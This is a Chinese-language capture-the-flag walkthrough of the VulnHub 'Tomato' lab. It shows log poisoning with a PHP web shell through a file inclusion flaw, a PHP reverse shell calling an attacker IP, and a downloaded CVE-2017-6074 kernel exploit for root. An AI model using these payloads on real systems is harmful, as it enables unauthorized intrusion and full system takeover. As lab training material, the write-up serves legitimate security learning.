這個靶機挺有意思,它是通過文件包含漏洞進行的getshell,主要姿勢是將含有一句話木馬的內容記錄到ssh的登錄日志中,然后利用文件包含漏洞進行包含,從而拿到shell
0x01 靶機信息
靶機:Tomato
難度:中—難
下載:https://www.vulnhub.com/entry/tomato-1,557/
靶機描述:
0x02 信息收集
nmap掃描存活主機確定靶場ip
nmap -sP 192.168.43.0/24
接下來掃描靶機的端口
nmap -sS -sV -p- -v 192.168.43.165
0x03 漏洞發現
然后訪問web服務
網站目錄掃描
dirb http://192.168.43.165:80
訪問antibot_image發現存在目錄遍歷
發現info.php是phpinfo的界面
查看頁面源代碼發現一串文件包含的代碼
http://192.168.43.165/antibot_image/antibots/info.php?image=/etc/passwd
0x04 漏洞利用
接下來嘗試文件包含被污染的SSH日志來getshell
ssh '<?php system($_GET['shell']); ?>'@192.168.43.165 -p2211
這樣'<?php system($_GET['shell']); ?>'該用戶就會被記錄到ssh的日志中去
ssh日志在/var/log/auth.log中
開啟nc監聽
nc -lvnp 3388
反彈shell 將
http://192.168.43.165/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&shell=php -r '$sock=fsockopen("192.168.43.221",3388);exec("/bin/sh -i <&3 >&3 2>&3");'
其中以下語句是建立socket會話,然后反向連接
php -r '$sock=fsockopen("192.168.43.221",3388);exec("/bin/sh -i <&3 >&3 2>&3");'
然后進行url編碼
http://192.168.43.165/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&shell=php+-r+%27%24sock%3dfsockopen(%22192.168.43.221%22%2c3388)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27
訪問URL,成功反彈shell
0x05 權限提升
我們首先建立可交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
然后查看linux內核版本
uname -a
去github上去找這個版本的exp
https://github.com/kkamagui/linux-kernel-exploits
用這個CVE-2017-6074的
、
下載到本地
git clone https://github.com/kkamagui/linux-kernel-exploits.git
然后運行compile.sh 編譯c文件
並上傳到目標主機
python -m SimpleHTTPServer 8000
然后用wget下載到靶機上
wget http://192.168.43.221:8000/CVE-2017-6074
查看該文件的權限
ls -l
賦予執行權限
chmod +x CVE-2017-6074
運行該文件
發現已經拿到root權限
參考:https://mp.weixin.qq.com/s/40zG1Tjmo_8pbbpN-IWZ4A